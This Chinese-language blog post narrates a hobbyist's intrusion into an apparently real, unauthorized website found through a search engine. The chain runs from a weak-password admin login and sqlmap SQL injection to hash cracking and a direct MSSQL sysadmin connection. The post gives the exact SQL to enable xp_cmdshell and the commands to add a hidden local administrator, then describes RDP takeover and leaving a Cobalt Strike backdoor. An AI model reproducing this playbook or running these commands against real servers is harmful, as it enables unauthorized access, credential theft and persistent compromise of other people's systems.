引子
5.20闲着无聊,那就来挖洞吧,打穿一台机器的体验可比去外面玩成就感大多了
过程
登录后台
通过搜索引擎搜索到了某个网站的后台,首先使用弱口令,(123456),结果直接进去了
data:image/s3,"s3://crabby-images/f9289/f9289f52948d65475bc04a5c347f2c8d5df103d1" alt="成功进入后台界面"
发现漏洞
通常,网站的后台会存在大量的漏洞,如文件上传,SQL注入等,我使用扫描器发现了该网站后台存在SQL报错注入。
data:image/s3,"s3://crabby-images/65c76/65c76a5c684eb77641e27e21e8dbbe0d837874c0" alt="渗透用的Xray的扫描器界面"
SQL注入
标记扫描器扫出的SQL注入点后,直接进sqlmap跑,成功获得了数据库列表
data:image/s3,"s3://crabby-images/be8cb/be8cbba079eea1b6ecc2fdf34ec945f15b185e41" alt="渗透用的poc包"
data:image/s3,"s3://crabby-images/f28be/f28becbd4fc3721659f49c1699a94c54ef4c85a1" alt="sqlmap跑出的数据库列表"
查看当前用户权限,发现是dba(数据库管理员)
data:image/s3,"s3://crabby-images/c2932/c29320a4f1226bad16f08095f4f9de0682949944" alt="查看当前的数据库权限"
查看数据库类型是SQL server,mssql的提权比mysql的方便,因为能直接调用xp_cmd模块直接执行命令
尝试执行命令
使用os-shell执行命令失败
data:image/s3,"s3://crabby-images/a8cba/a8cbaf814214e68c49423caa0de1f6c4e7978b17" alt="sqlmap表示无法执行命令"
破解密码
尝试读取数据库用户密码哈希,通过在线查询哈希
data:image/s3,"s3://crabby-images/65810/658105acc0b96acd90f119d410732e924e997f8e" alt="直接使用password读取密码"
emmm
data:image/s3,"s3://crabby-images/ac668/ac668638b7869c37af0f533b971a4e16f5796221" alt="通过在线网站获取明文"
成功获取到明文密码
data:image/s3,"s3://crabby-images/79d32/79d321b6957dfa1fc17e4d65279013793c34ee6a" alt="拿到密码"
扫描端口
对目标服务器进行全端口扫描,发现目标机器开放了SQL server端口1433
data:image/s3,"s3://crabby-images/fe62e/fe62e5a2ab51db115de2135048acc391ffc2bd00" alt="fofa的扫描结果"
连接数据库
使用数据库连接工具成功连接
data:image/s3,"s3://crabby-images/fc547/fc547112a69087de5d82968daaf9c81df2da5002" alt="成功连接数据库"
连接数据库后,如过遇到简单的杀软,可以查看从 SQL Server 提权到远程桌面(存在杀软)
查看当前用户权限
执行sql语句:
WITH CTE AS (
SELECT
u.name AS 用户名,
u.is_disabled AS 是否禁用,
g.name AS 服务器角色,
'√' AS 'flag'
FROM
sys.server_principals u
INNER JOIN sys.server_role_members m ON u.principal_id = m.member_principal_id
INNER JOIN sys.server_principals g ON g.principal_id = m.role_principal_id
) SELECT
*
FROM
CTE PIVOT ( MAX ( flag ) FOR 服务器角色 IN ( [public], [sysadmin], [securityadmin], [serveradmin], [setupadmin], [processadmin], [diskadmin], [dbcreator], [bulkadmin] ) ) AS T;
发现是system管理员权限
data:image/s3,"s3://crabby-images/b543f/b543fb0027a5fcc33c85161d07acfe26b7b1f2e3" alt="当前数据库用户为系统管理员"
执行命令
直接执行sql语句,打开xp_cmd
use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
data:image/s3,"s3://crabby-images/bb71d/bb71d2c5260435035b1a80c4030bc331c45ad3a9" alt="成功打开xm_cmd"
查看当前用户权限
use master;
exec master..xp_cmdshell "whoami";
data:image/s3,"s3://crabby-images/a7c91/a7c91ae81a4cea047eb09f7bc05a7209d68fa92e" alt="执行命令结果"
发现是system权限,直接创建新的管理员账户
创建管理员
use master;
exec master..xp_cmdshell "net user test12 dreamfall.cn1 /add";
data:image/s3,"s3://crabby-images/bc5ef/bc5ef347096f0ad074887bf5ac3c7f0003b0bdd7" alt="创建用户"
net localgroup administrators test12 /add
data:image/s3,"s3://crabby-images/268ff/268ff6b1c8da02ef5a67d6bf8a3847aa452277cf" alt="提升为管理员"
远程桌面
通过远程桌面成功登录,获取目标主机的全部权限
data:image/s3,"s3://crabby-images/7709a/7709a072b5eb5aa7188def2775e7d0e6c3dfdbd9" alt="成功登录远程桌面"
上线CS
在服务器中留下后门,以便随时随地访问此站
总结
千万不要为了方便使用简单密码
流程总结:弱口令进后台,后台sql注入,获取到数据库用户哈希,弱密码哈希破解,发现开数据库端口,直接连接,发现是dba权限,直接调用xp_cmd执行命令创建管理员账户,登录远程桌面
Comments NOTHING